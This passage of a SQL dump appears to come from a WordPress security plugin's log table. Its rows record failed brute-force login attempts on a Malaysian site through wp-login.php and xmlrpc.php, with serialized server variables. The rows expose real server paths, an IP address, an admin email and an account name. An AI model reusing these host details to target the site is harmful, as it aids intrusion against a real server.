11:16:11',17907680,19231968,'https://bintara.com.my/wp-login.php',1,0,'52.64.168.0'),(24522,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"52.64.168.0\";s:11:\"REMOTE_PORT\";s:5:\"45760\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDAfVd3b0tfDgYOg7jsuQAAAJg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568718975.1751\";s:12:\"REQUEST_TIME\";s:10:\"1568718975\";}}','notice','2019-09-17 11:16:16','2019-09-17 11:16:15',18256872,19552768,'https://bintara.com.my/xmlrpc.php',1,0,'52.64.168.0'),(24523,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"144.217.70.157\";s:11:\"REMOTE_PORT\";s:5:\"59228\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDCQVd3b0tfDgYOg7jtdQAAAIs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568719429.8099\";s:12:\"REQUEST_TIME\";s:10:\"1568719429\";}}','notice','2019-09-17 11:23:57','2019-09-17 11:23:56',17742056,19233024,'https://bintara.com.my/wp-login.php',1,0,'144.217.70.157'),(24524,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"144.217.70.157\";s:11:\"REMOTE_PORT\";s:5:\"34988\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDCTld3b0tfDgYOg7jteQAAAJQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568719447.2507\";s:12:\"REQUEST_TIME\";s:10:\"1568719447\";}}','notice','2019-09-17 11:24:10','2019-09-17 11:24:08',18258960,19558664,'https://bintara.com.my/xmlrpc.php',1,0,'144.217.70.157'),(24525,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"52.64.168.0\";s:11:\"REMOTE_PORT\";s:5:\"49840\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDEJld3b0tfDgYOg7jvEQAAAIA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568719910.8587\";s:12:\"REQUEST_TIME\";s:10:\"1568719910\";}}','notice','2019-09-17 11:31:52','2019-09-17 11:31:51',17741480,19232352,'https://bintara.com.my/wp-login.php',1,0,'52.64.168.0'),(24526,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"52.64.168.0\";s:11:\"REMOTE_PORT\";s:5:\"50418\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDEKVd3b0tfDgYOg7jvEwAAAIs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568719916.1903\";s:12:\"REQUEST_TIME\";s:10:\"1568719916\";}}','notice','2019-09-17 11:31:57','2019-09-17 11:31:56',18261584,19560712,'https://bintara.com.my/xmlrpc.php',1,0,'52.64.168.0'),(24527,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"178.62.33.222\";s:11:\"REMOTE_PORT\";s:5:\"53336\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDGL1d3b0tfDgYOg7jwdQAAAJg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568720431.8346\";s:12:\"REQUEST_TIME\";s:10:\"1568720431\";}}','notice','2019-09-17 11:40:33','2019-09-17 11:40:32',17741608,19232720,'https://bintara.com.my/wp-login.php',1,0,'178.62.33.222'),(24528,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"178.62.33.222\";s:11:\"REMOTE_PORT\";s:5:\"54580\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDGN1d3b0tfDgYOg7jwfAAAAI0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568720439.8299\";s:12:\"REQUEST_TIME\";s:10:\"1568720439\";}}','notice','2019-09-17 11:40:41','2019-09-17 11:40:40',18255128,19553024,'https://bintara.com.my/xmlrpc.php',1,0,'178.62.33.222'),(24529,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"68.183.130.158\";s:11:\"REMOTE_PORT\";s:5:\"55510\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDH51d3b0tfDgYOg7jybgAAAIE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568720872.0494\";s:12:\"REQUEST_TIME\";s:10:\"1568720872\";}}','notice','2019-09-17 11:47:53','2019-09-17 11:47:52',17744944,19232328,'https://bintara.com.my/wp-login.php',1,0,'68.183.130.158'),(24530,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"68.183.130.158\";s:11:\"REMOTE_PORT\";s:5:\"55510\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDH51d3b0tfDgYOg7jybgAAAIE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568720872.0494\";s:12:\"REQUEST_TIME\";s:10:\"1568720872\";}}','notice','2019-09-17 11:47:54','2019-09-17 